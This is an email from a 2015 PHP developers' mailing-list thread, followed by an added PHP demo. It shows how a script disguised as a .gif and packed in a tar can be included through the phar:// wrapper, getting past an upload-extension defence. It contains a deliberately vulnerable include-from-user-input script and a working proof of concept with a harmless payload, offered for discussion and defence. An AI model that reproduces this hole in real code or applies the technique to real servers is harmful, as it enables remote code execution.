Hi Stas, On Wed, Feb 25, 2015 at 7:07 AM, Stanislav Malyshev <smalys...@gmail.com> wrote:
> > They'd need to upload with a matching file type. Instead of any file
>
> Not sure what you mean by that. phar can read tars, etc. AFAIK, can't
> it? Also, phar archive has no requirement of being named something.phar,
> afaik can be also named cuteponies.gif. E.g., I just did this:
>
> 1. Created file chump.php:
>
> <?php
>
> include $argv[1];
>
> This is an idealized vulnerable script.
>
> 2. Created file pwnd.php:
>
> <?php
>
> echo "pwnd!";
>
> This is an idealized exploit.
>
> 3. Put it into an archive:
>
> tar cvzf cuteponies.gif pwnd.php
>
> 4. Run this:
>
> php -dallow_url_include=0 chump.php phar://cuteponies.gif/pwnd.php
>
> The output is:
>
> pwnd!
>
> I'm not sure how this measure would protect from such a scenario. Am I
> missing something here?

I think he means matching file "extension". File extension should represent file type, though.

The new RFC checks filename extensions. It allows only ".php" and ".phar" as PHP script extensions, and move_uploaded_file() refuses to move PHP scripts by default. (The old idea was to detect PHP scripts by their contents. The new RFC restricts PHP script file extensions instead.)

Since "pwnd.php" has the ".php" extension, move_uploaded_file() refuses to move it to the upload dir by default. As long as the user uses the defaults and move_uploaded_file(), they are free from script upload attacks, including embedded scripts.

Regards,

--
Yasuo Ohgaki
yohg...@ohgaki.net
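The following is an added example, not code from either message above or from the RFC under discussion. It reproduces Stas's four steps in a single PHP script (building the archive with PharData, which works under the default phar.readonly=1 because it only creates tar/zip archives, not executable phars), and then shows a userland approximation of the extension check Yasuo describes. The function names is_script_name() and safe_move_uploaded() and the assumption that the RFC's default list is exactly ".php" and ".phar", applied to the destination file name, are mine.

```php
<?php
// Added example for the thread above; not the RFC's code and not either poster's.
declare(strict_types=1);

$dir = sys_get_temp_dir() . '/phar-demo-' . getmypid();
mkdir($dir, 0700);

// Step 2 + 3: build a plain tar containing pwnd.php (the "idealized exploit").
// PharData creates tar/zip archives even with phar.readonly=1.
$tar = "$dir/cuteponies.tar";
$archive = new PharData($tar);
$archive->addFromString('pwnd.php', "<?php\necho \"pwnd!\";\n");
unset($archive);

// Give the archive a harmless-looking name. The phar:// wrapper identifies the
// archive by its contents, so the extension is irrelevant to it.
$gif = "$dir/cuteponies.gif";
rename($tar, $gif);

// Step 1: the "idealized vulnerable script": include of a user-controlled path.
$chump = "$dir/chump.php";
file_put_contents($chump, "<?php\ninclude \$argv[1];\n");

// Step 4: run it exactly as in the thread. allow_url_include=0 does not matter,
// because phar:// is a local stream wrapper, not a remote one.
$cmd = sprintf(
    '%s -dallow_url_include=0 %s %s',
    escapeshellarg(PHP_BINARY),
    escapeshellarg($chump),
    escapeshellarg("phar://$gif/pwnd.php")
);
echo trim((string) shell_exec($cmd)), "\n";   // prints: pwnd!

// Userland approximation of the check Yasuo describes (assumption: the RFC's
// default list of script extensions is ".php" and ".phar", checked on the
// destination name that move_uploaded_file() would write).
function is_script_name(string $name): bool
{
    return (bool) preg_match('/\.(php|phar)$/i', basename($name));
}

function safe_move_uploaded(string $tmpName, string $destination): bool
{
    if (is_script_name($destination)) {
        return false;   // refuse to place a script-named file in the upload dir
    }
    return move_uploaded_file($tmpName, $destination);
}

// What the check would decide for the two names in this scenario.
var_dump(is_script_name('pwnd.php'));        // bool(true)  -> refused
var_dump(is_script_name('cuteponies.gif'));  // bool(false) -> allowed

// Cleanup.
unlink($gif);
unlink($chump);
rmdir($dir);
```

Note what the last two lines show: the file that would actually be uploaded in Stas's scenario is cuteponies.gif, which the extension check accepts; pwnd.php only ever exists as a member inside the archive and is reached through the phar:// wrapper, never through move_uploaded_file(). The check is therefore a defence against direct script uploads, not against this inclusion path. For the include side, the practical controls are to never build an include path from user input and, where the application does not need the wrapper, to disable it with stream_wrapper_unregister('phar').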